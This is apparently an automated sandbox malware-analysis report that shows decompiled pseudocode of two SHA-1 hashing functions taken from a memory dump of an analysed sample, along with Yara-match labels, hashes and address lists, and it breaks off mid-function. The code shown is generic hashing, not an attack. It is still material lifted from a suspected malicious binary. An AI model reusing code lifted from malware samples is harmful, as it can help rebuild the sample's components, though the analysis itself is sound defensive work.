                                                        0x0041b843
                                                        0x0041b849
                                                        0x0041b84a
                                                        0x0041b84b
                                                        0x0041b851
                                                        0x0041b857
                                                        0x0041b858
                                                        0x0041b865
                                                        0x0041b86b
                                                        0x0041b878
                                                        0x0041b87e
                                                        0x0041b88b
                                                        0x0041b899
                                                        0x0041b8a4
                                                        0x0041b8a4
                                                        0x0041b8ab
                                                        0x0041b8b1
                                                        0x0041b8b7
                                                        0x0041b8ce
                                                        0x0041b8cf
                                                        0x0041b8d6
                                                        0x0041b8dc
                                                        0x0041b8e3
                                                        0x0041b8e4
                                                        0x0041b8f3
                                                        0x0041b8f9
                                                        0x0041b8fc
                                                        0x0041b908
                                                        0x0041b90e
                                                        0x0041b914
                                                        0x0041b914
                                                        0x0041b914
                                                        0x0041b92a
                                                        0x0041b93a
                                                        0x0041b947
                                                        0x0041b948
                                                        0x0041b94e
                                                        0x0041b955
                                                        0x0041b956
                                                        0x0041b95d
                                                        0x0041b97e
                                                        0x0041b97f
                                                        0x0041b985
                                                        0x0041b98b
                                                        0x0041b991
                                                        0x0041b997
                                                        0x0041b99d
                                                        0x0041b9a3
                                                        0x0041b9aa
                                                        0x0041b9b0
                                                        0x0041b9bd
                                                        0x0041b9c9
                                                        0x0041b9d6
                                                        0x0041b9dc
                                                        0x0041b9e9
                                                        0x0041b9f0
                                                        0x0041b9f6
                                                        0x0041b9ff
                                                        0x0041ba05
                                                        0x0041ba12
                                                        0x0041ba18
                                                        0x0041ba2a
                                                        0x0041ba33
                                                        0x0041ba33
                                                        0x0041ba33
                                                        0x0041ba3a
                                                        0x0041ba3c
                                                        0x0041ba3d
                                                        0x0041ba47
                                                        0x0041ba4d
                                                        0x0041ba53
                                                        0x0041ba59
                                                        0x0041ba5f
                                                        0x0041ba65
                                                        0x0041ba6b
                                                        0x0041ba71
                                                        0x0041ba77
                                                        0x0041ba7e
                                                        0x0041ba8c
                                                        0x0041ba99
                                                        0x0041ba9a
                                                        0x0041baa4
                                                        0x0041baa7
                                                        0x0041baaa
                                                        0x0041bab0
                                                        0x0041bab6
                                                        0x0041babc
                                                        0x0041babd
                                                        0x0041babd
                                                        0x0041ba6b
                                                        0x0041b9c9
                                                        0x0041b803
                                                        0x0041b79e
                                                        0x0041b6cc
                                                        0x0041b638
                                                        0x0041b628
                                                        0x0041b616
                                                        0x0041b5f5
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: u,
                                                        • API String ID: 0-1411166003
                                                        • Opcode ID: 46b4087cce274b2668a8419b26ca95e8b37dbfbbfe1889b2e9c7c0f372f8a7ba
                                                        • Instruction ID: 9375bfc2f488332c893dba69b85f0ea3c7b5697d8186f92e2bf1608e3ccbc249
                                                        • Opcode Fuzzy Hash: 46b4087cce274b2668a8419b26ca95e8b37dbfbbfe1889b2e9c7c0f372f8a7ba
                                                        • Instruction Fuzzy Hash: 2952A632948785CFE706DF38D89AB423FB6F346320B08438ED8A197592D7386569DF85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00408C4B, Relevance: 1.7, Strings: 1, Instructions: 424COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00408C4B(void* __ecx, signed int __edi, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t281;
				signed int* _t282;
				signed int _t283;
				signed int _t289;
				signed int _t292;
				signed int _t296;
				signed int _t299;
				signed int _t303;
				signed int _t307;
				signed int _t309;
				signed int _t315;
				signed int _t323;
				signed int _t325;
				signed int _t328;
				signed int _t330;
				signed int _t339;
				signed int _t345;
				signed int _t346;
				signed int _t351;
				signed int _t360;
				signed int _t364;
				signed int _t365;
				signed int _t369;
				signed int _t372;
				signed int _t376;
				signed int _t377;
				signed int _t406;
				signed int _t411;
				signed int _t417;
				signed int _t420;
				signed int _t427;
				signed int _t430;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int _t452;
				signed int _t467;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t478;
				signed int _t486;
				signed int _t487;
				signed int* _t488;
				signed int* _t491;
				signed int _t498;
				signed int _t501;
				signed int _t506;
				signed int _t509;
				signed int _t512;
				signed int _t515;
				signed int _t516;
				signed int _t520;
				signed int _t532;
				signed int _t535;
				signed int _t542;
				void* _t548;
				void* _t550;

				 *(__ecx - 0x74aacf64) =  *(__ecx - 0x74aacf64) ^ __edi;
				_t548 = _t550;
				_t491 = _a4;
				_push(__edi);
				_t360 = 0;
				_t4 =  &(_t491[7]); // 0x1b
				_t281 = _t4;
				do {
					 *(_t548 + _t360 * 4 - 0x14c) = ((( *(_t281 - 1) & 0x000000ff) << 0x00000008 |  *_t281 & 0x000000ff) << 0x00000008 | _t281[1] & 0x000000ff) << 0x00000008 | _t281[2] & 0x000000ff;
					 *(_t548 + _t360 * 4 - 0x148) = (((_t281[3] & 0x000000ff) << 0x00000008 | _t281[4] & 0x000000ff) << 0x00000008 | _t281[5] & 0x000000ff) << 0x00000008 | _t281[6] & 0x000000ff;
					 *(_t548 + _t360 * 4 - 0x144) = (((_t281[7] & 0x000000ff) << 0x00000008 | _t281[8] & 0x000000ff) << 0x00000008 | _t281[9] & 0x000000ff) << 0x00000008 | _t281[0xa] & 0x000000ff;
					 *(_t548 + _t360 * 4 - 0x140) = (((_t281[0xb] & 0x000000ff) << 0x00000008 | _t281[0xc] & 0x000000ff) << 0x00000008 | _t281[0xd] & 0x000000ff) << 0x00000008 | _t281[0xe] & 0x000000ff;
					_t360 = _t360 + 4;
					_t281 =  &(_t281[0x10]);
				} while (_t360 < 0x10);
				_t282 =  &_v304;
				_v8 = 0x10;
				do {
					_t406 =  *(_t282 - 0x18);
					_t467 =  *(_t282 - 0x14);
					_t364 =  *(_t282 - 0x20) ^ _t282[5] ^  *_t282 ^ _t406;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t282[9] =  *(_t282 - 0x1c) ^ _t282[6] ^ _t282[1] ^ _t467;
					_t282[8] = _t364;
					_t323 = _t282[7] ^  *(_t282 - 0x10) ^ _t282[2];
					_t282 =  &(_t282[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t48 =  &_v8;
					 *_t48 = _v8 - 1;
					_t282[6] = _t323 ^ _t406;
					_t282[7] =  *(_t282 - 0x1c) ^  *(_t282 - 4) ^ _t364 ^ _t467;
				} while ( *_t48 != 0);
				_t325 =  *_t491;
				_t283 = _t491[1];
				_t365 = _t491[2];
				_t411 = _t491[3];
				_v12 = _t325;
				_v16 = _t491[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t470 = _v8;
					_t498 = _t325 + ( !_t283 & _t411 | _t365 & _t283) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t328 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t411;
					_v12 = _t498;
					asm("rol esi, 0x5");
					_v8 = _t365;
					_t417 = _t498 + ( !_t328 & _t365 | _t283 & _t328) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t501 = _t283;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t369 = _v12;
					_v8 = _t328;
					_t330 = _v8;
					_v12 = _t417;
					asm("rol edx, 0x5");
					_t289 = _t417 + ( !_t369 & _t501 | _t328 & _t369) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t420 = _v12;
					_v16 = _t501;
					asm("ror ecx, 0x2");
					_v8 = _t369;
					_v12 = _t289;
					asm("rol eax, 0x5");
					_v16 = _t330;
					_t506 = _t289 + ( !_t420 & _t330 | _t369 & _t420) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t365 = _v12;
					_t292 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t420;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_v16 = _t292;
					_t283 = _v12;
					_t509 = _t506 + ( !_t365 & _t292 | _t420 & _t365) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t411 = _v8;
					asm("ror ecx, 0x2");
					_t471 = _t470 + 5;
					_t325 = _t509;
					_v12 = _t325;
					_v8 = _t471;
				} while (_t471 < 0x14);
				_t472 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t411;
					_t512 = _t509 + (_t411 ^ _t365 ^ _t283) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t339 = _v12;
					_v12 = _t512;
					asm("rol esi, 0x5");
					_t427 = _t512 + (_t365 ^ _t283 ^ _t339) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t515 = _t283;
					_v16 = _t365;
					_t372 = _v12;
					_v12 = _t427;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t296 = _t427 + (_t283 ^ _t339 ^ _t372) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t430 = _v12;
					_v8 = _t339;
					_v8 = _t372;
					_v12 = _t296;
					asm("rol eax, 0x5");
					_t472 = _t472 + 5;
					_t365 = _v12;
					asm("ror edx, 0x2");
					_t148 = _t515 + 0x6ed9eba1; // 0x6ed9eb9f
					_t516 = _t296 + (_t339 ^ _v8 ^ _t430) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x154)) + _t148;
					_t299 = _v8;
					_v8 = _t430;
					_v12 = _t516;
					asm("rol esi, 0x5");
					_t411 = _v8;
					_t509 = _t516 + (_t299 ^ _v8 ^ _t365) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x150)) + _t339 + 0x6ed9eba1;
					_v16 = _t299;
					_t283 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t509;
				} while (_t472 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t411;
					asm("ror eax, 0x2");
					_t520 = ((_t365 | _t283) & _t411 | _t365 & _t283) +  *((intOrPtr*)(_t548 + _v8 * 4 - 0x14c)) + _t509 + _v16 - 0x70e44324;
					_t478 = _v12;
					_v12 = _t520;
					asm("rol esi, 0x5");
					_t345 = _v8;
					asm("ror edi, 0x2");
					_t439 = ((_t283 | _t478) & _t365 | _t283 & _t478) +  *((intOrPtr*)(_t548 + _t345 * 4 - 0x148)) + _t520 + _v16 - 0x70e44324;
					_v16 = _t365;
					_t376 = _v12;
					_v12 = _t439;
					asm("rol edx, 0x5");
					_v8 = _t283;
					_t441 = ((_t478 | _t376) & _t283 | _t478 & _t376) +  *((intOrPtr*)(_t548 + _t345 * 4 - 0x144)) + _t439 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t303 = _v12;
					_v8 = _t478;
					_v12 = _t441;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t532 = ((_t376 | _t303) & _t478 | _t376 & _t303) +  *((intOrPtr*)(_t548 + _t345 * 4 - 0x140)) + _t441 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t444 = _t376;
					_t365 = _v12;
					_v8 = _t444;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t509 = ((_t303 | _t365) & _t444 | _t303 & _t365) +  *((intOrPtr*)(_t548 + _t345 * 4 - 0x13c)) + _t532 + _v16 - 0x70e44324;
					_t411 = _t303;
					_t283 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t509;
					_t346 = _t345 + 5;
					_v8 = _t346;
				} while (_t346 < 0x3c);
				_t486 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t487 = _v8;
					asm("ror eax, 0x2");
					_t535 = (_t411 ^ _t365 ^ _t283) +  *((intOrPtr*)(_t548 + _t486 * 4 - 0x14c)) + _t509 + _v16 - 0x359d3e2a;
					_t351 = _v12;
					_v16 = _t411;
					_v12 = _t535;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t452 = (_t365 ^ _t283 ^ _t351) +  *((intOrPtr*)(_t548 + _t487 * 4 - 0x148)) + _t535 + _v16 - 0x359d3e2a;
					_v16 = _t365;
					_t377 = _v12;
					_v12 = _t452;
					asm("rol edx, 0x5");
					_v16 = _t283;
					asm("ror ecx, 0x2");
					_t307 = (_t283 ^ _t351 ^ _t377) +  *((intOrPtr*)(_t548 + _t487 * 4 - 0x144)) + _t452 + _v16 - 0x359d3e2a;
					_t411 = _v12;
					_v12 = _t307;
					asm("rol eax, 0x5");
					_v16 = _t351;
					_t542 = (_t351 ^ _t377 ^ _t411) +  *((intOrPtr*)(_t548 + _t487 * 4 - 0x140)) + _t307 + _v16 - 0x359d3e2a;
					_t309 = _t377;
					_v8 = _t351;
					asm("ror edx, 0x2");
					_v8 = _t377;
					_t365 = _v12;
					_v12 = _t542;
					asm("rol esi, 0x5");
					_t486 = _t487 + 5;
					_t509 = (_t309 ^ _t411 ^ _t365) +  *((intOrPtr*)(_t548 + _t487 * 4 - 0x13c)) + _t542 + _v16 - 0x359d3e2a;
					_v16 = _t309;
					_t283 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t411;
					_v12 = _t509;
					_v8 = _t486;
				} while (_t486 < 0x50);
				_t488 = _a4;
				_t488[2] = _t488[2] + _t365;
				_t488[3] = _t488[3] + _t411;
				_t315 = _t488[4] + _v16;
				 *_t488 =  *_t488 + _t509;
				_t488[1] = _t488[1] + _t283;
				_t488[4] = _t315;
				_t488[0x17] = 0;
				return _t315;
			}

































































                                                        0x00408c4c
                                                        0x00408c51
                                                        0x00408c5b
                                                        0x00408c5e
                                                        0x00408c5f
                                                        0x00408c61
                                                        0x00408c61
                                                        0x00408c64
                                                        0x00408c86
                                                        0x00408cac
                                                        0x00408cd2
                                                        0x00408cf4
                                                        0x00408cfb
                                                        0x00408cfe
                                                        0x00408d01
                                                        0x00408d0a
                                                        0x00408d10
                                                        0x00408d17
                                                        0x00408d28
                                                        0x00408d2b
                                                        0x00408d2e
                                                        0x00408d32
                                                        0x00408d34
                                                        0x00408d36
                                                        0x00408d3f
                                                        0x00408d42
                                                        0x00408d45
                                                        0x00408d50
                                                        0x00408d56
                                                        0x00408d58
                                                        0x00408d58
                                                        0x00408d5b
                                                        0x00408d5e
                                                        0x00408d5e
                                                        0x00408d63
                                                        0x00408d65
                                                        0x00408d68
                                                        0x00408d6b
                                                        0x00408d71
                                                        0x00408d74
                                                        0x00408d77
                                                        0x00408d80
                                                        0x00408d86
                                                        0x00408d8f
                                                        0x00408d9e
                                                        0x00408da5
                                                        0x00408da8
                                                        0x00408dab
                                                        0x00408db4
                                                        0x00408db7
                                                        0x00408dba
                                                        0x00408dd2
                                                        0x00408dd9
                                                        0x00408ddb
                                                        0x00408dde
                                                        0x00408de1
                                                        0x00408dea
                                                        0x00408df1
                                                        0x00408df4
                                                        0x00408df7
                                                        0x00408e06
                                                        0x00408e0d
                                                        0x00408e10
                                                        0x00408e13
                                                        0x00408e1c
                                                        0x00408e26
                                                        0x00408e29
                                                        0x00408e35
                                                        0x00408e38
                                                        0x00408e3f
                                                        0x00408e42
                                                        0x00408e45
                                                        0x00408e4a
                                                        0x00408e4d
                                                        0x00408e56
                                                        0x00408e67
                                                        0x00408e6a
                                                        0x00408e6d
                                                        0x00408e74
                                                        0x00408e77
                                                        0x00408e7a
                                                        0x00408e7d
                                                        0x00408e7f
                                                        0x00408e82
                                                        0x00408e85
                                                        0x00408e8e
                                                        0x00408e93
                                                        0x00408e93
                                                        0x00408ea8
                                                        0x00408eab
                                                        0x00408eae
                                                        0x00408eb5
                                                        0x00408eb8
                                                        0x00408ebb
                                                        0x00408ed0
                                                        0x00408ed7
                                                        0x00408eda
                                                        0x00408ede
                                                        0x00408ee1
                                                        0x00408ee6
                                                        0x00408ee9
                                                        0x00408ef8
                                                        0x00408efb
                                                        0x00408f02
                                                        0x00408f05
                                                        0x00408f08
                                                        0x00408f0b
                                                        0x00408f0e
                                                        0x00408f16
                                                        0x00408f24
                                                        0x00408f27
                                                        0x00408f2a
                                                        0x00408f2a
                                                        0x00408f31
                                                        0x00408f34
                                                        0x00408f37
                                                        0x00408f3f
                                                        0x00408f4d
                                                        0x00408f50
                                                        0x00408f57
                                                        0x00408f5a
                                                        0x00408f5d
                                                        0x00408f60
                                                        0x00408f63
                                                        0x00408f6c
                                                        0x00408f73
                                                        0x00408f73
                                                        0x00408f79
                                                        0x00408f92
                                                        0x00408f95
                                                        0x00408f9c
                                                        0x00408f9f
                                                        0x00408fa2
                                                        0x00408fb4
                                                        0x00408fbe
                                                        0x00408fc1
                                                        0x00408fca
                                                        0x00408fcd
                                                        0x00408fd4
                                                        0x00408fd7
                                                        0x00408fdd
                                                        0x00408ff0
                                                        0x00408ff7
                                                        0x00408ffa
                                                        0x00408ffd
                                                        0x00409000
                                                        0x00409009
                                                        0x0040900c
                                                        0x0040901f
                                                        0x00409022
                                                        0x0040902c
                                                        0x0040902f
                                                        0x00409031
                                                        0x0040903a
                                                        0x0040903d
                                                        0x00409050
                                                        0x00409056
                                                        0x00409059
                                                        0x00409060
                                                        0x00409062
                                                        0x00409065
                                                        0x00409068
                                                        0x0040906b
                                                        0x0040906e
                                                        0x00409071
                                                        0x0040907a
                                                        0x0040907f
                                                        0x00409082
                                                        0x00409082
                                                        0x00409095
                                                        0x00409098
                                                        0x0040909b
                                                        0x004090a2
                                                        0x004090a5
                                                        0x004090a8
                                                        0x004090ab
                                                        0x004090be
                                                        0x004090c1
                                                        0x004090cc
                                                        0x004090cf
                                                        0x004090db
                                                        0x004090de
                                                        0x004090e4
                                                        0x004090e7
                                                        0x004090ea
                                                        0x004090f1
                                                        0x00409101
                                                        0x00409104
                                                        0x0040910a
                                                        0x0040910d
                                                        0x00409114
                                                        0x00409116
                                                        0x00409119
                                                        0x0040911c
                                                        0x0040911f
                                                        0x00409122
                                                        0x00409129
                                                        0x00409138
                                                        0x0040913b
                                                        0x00409142
                                                        0x00409145
                                                        0x00409148
                                                        0x0040914b
                                                        0x0040914e
                                                        0x00409151
                                                        0x00409154
                                                        0x0040915d
                                                        0x0040916e
                                                        0x00409176
                                                        0x0040917c
                                                        0x0040917f
                                                        0x00409181
                                                        0x00409184
                                                        0x00409187
                                                        0x00409194

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        • Opcode ID: 0a462bd2bf13d2726f553aca60980011e54a9b9a3343683df93d56a0bc991c02
                                                        • Instruction ID: 04089c799bc4b0352c5f97b158cdbbeacd7a82db495fa5040136e8b17c27335c
                                                        • Opcode Fuzzy Hash: 0a462bd2bf13d2726f553aca60980011e54a9b9a3343683df93d56a0bc991c02
                                                        • Instruction Fuzzy Hash: 12021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00408C50, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00408C50(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
